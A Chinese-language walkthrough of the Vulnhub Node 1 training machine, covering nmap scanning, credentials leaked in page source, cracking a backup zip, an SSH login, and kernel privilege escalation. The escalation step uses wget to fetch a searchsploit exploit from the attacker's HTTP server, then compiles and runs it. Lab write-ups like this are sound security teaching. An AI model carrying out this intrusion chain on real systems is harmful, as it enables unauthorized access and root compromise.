Vulnhub-node靶机教学

admin 2025年2月21日22:25:29评论6 views字数 1254阅读4分10秒阅读模式

本篇文章旨在为网络安全渗透测试靶机教学。通过阅读本文,读者将能够对渗透Vulnhub系列node靶机有一定的了解

一、信息收集阶段

靶机下载地址:https://www.vulnhub.com/entry/node-1,252
因为靶机为本地部署虚拟机网段,查看dhcp地址池设置。得到信息IP为:192.168.220.0/24

1、扫描网段,发现主机

nmap -sP 192.168.220.0/24
# 快速验证网段存活主机
Vulnhub-node靶机教学

2、扫描主机详细信息

nmap -sT -sV -sC  192.168.220.131
#-sT 会尝试与目标主机的每个端口建立完整的 TCP 连接
#-sV 尝试确定每个打开端口上运行的服务的版本
#-sC 使用默认的脚本扫描(Script Scanning)可以帮助发现更多的信息,如漏洞、配置错误等
Vulnhub-node靶机教学

3、登陆apache网站查看信息

http://192.168.220.131:3000/
#可能存在的用户名:tom mark rastating
Vulnhub-node靶机教学

4、查看网页源码

Vulnhub-node靶机教学
Vulnhub-node靶机教学
Vulnhub-node靶机教学
Vulnhub-node靶机教学

二、渗透阶段

1、依次登陆用户查看信息/下载文件

username:myP14ceAdm1nAcc0uNT
password:manchester
Vulnhub-node靶机教学

2、查看/解密下载文件myplace.backup

cat myplace.backup
base64 -d myplace.backup > ab.backup
Vulnhub-node靶机教学
Vulnhub-node靶机教学

3、解密后的文件无法使用,修改文件类型

file ab.backup #查看文件类型
Vulnhub-node靶机教学
mv ab.backup ab.zip  #修改文件类型
Vulnhub-node靶机教学

4、解压压缩文件

unzip ab.zip
Vulnhub-node靶机教学

5、 fcrackzip爆破压缩文件/查看文件内容

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt ab.zip
# pw == magicword

cd var/www/myplace
Vulnhub-node靶机教学
Vulnhub-node靶机教学
Vulnhub-node靶机教学

6、ssh登陆

ssh [email protected]
# 输入密码:5AYRft73VtFpc84k
Vulnhub-node靶机教学

三、提权阶段

1、查找suid权限

find / -perm -4000 -print 2>/dev/null  #查找SUID 权限的文件
Vulnhub-node靶机教学

2、查看系统版本内核

uname -a
lsb_release -a
Vulnhub-node靶机教学

3、搜索历史漏洞

searchsploit ubuntu 16.04 
Vulnhub-node靶机教学

4、下载漏洞利用文件

searchsploit -m 44298.c  
Vulnhub-node靶机教学

5、python开启http微服务

python -m http.server 8088
Vulnhub-node靶机教学

6、靶机下载exp

cd /tmp  #切换到又权限的目录再下载
wget http://192.168.220.128:8088/44298.c
Vulnhub-node靶机教学

7、编译exp

gcc 44298.c -o poc
Vulnhub-node靶机教学

8、执行exp提权

./poc 
Vulnhub-node靶机教学

四、总结

本次靶机主要通过网页主页源码查看到api文件导致账号密码信息泄露,从而获取服务器普通用户权限,再根据机器上的系统内核版本的信息搜集,使用漏洞检索工具searchsploit,利用exp进行提权。

原文始发于微信公众号(泷羽SEC-ohh):Vulnhub-node靶机教学

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月21日22:25:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-node靶机教学https://cn-sec.com/archives/3768252.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息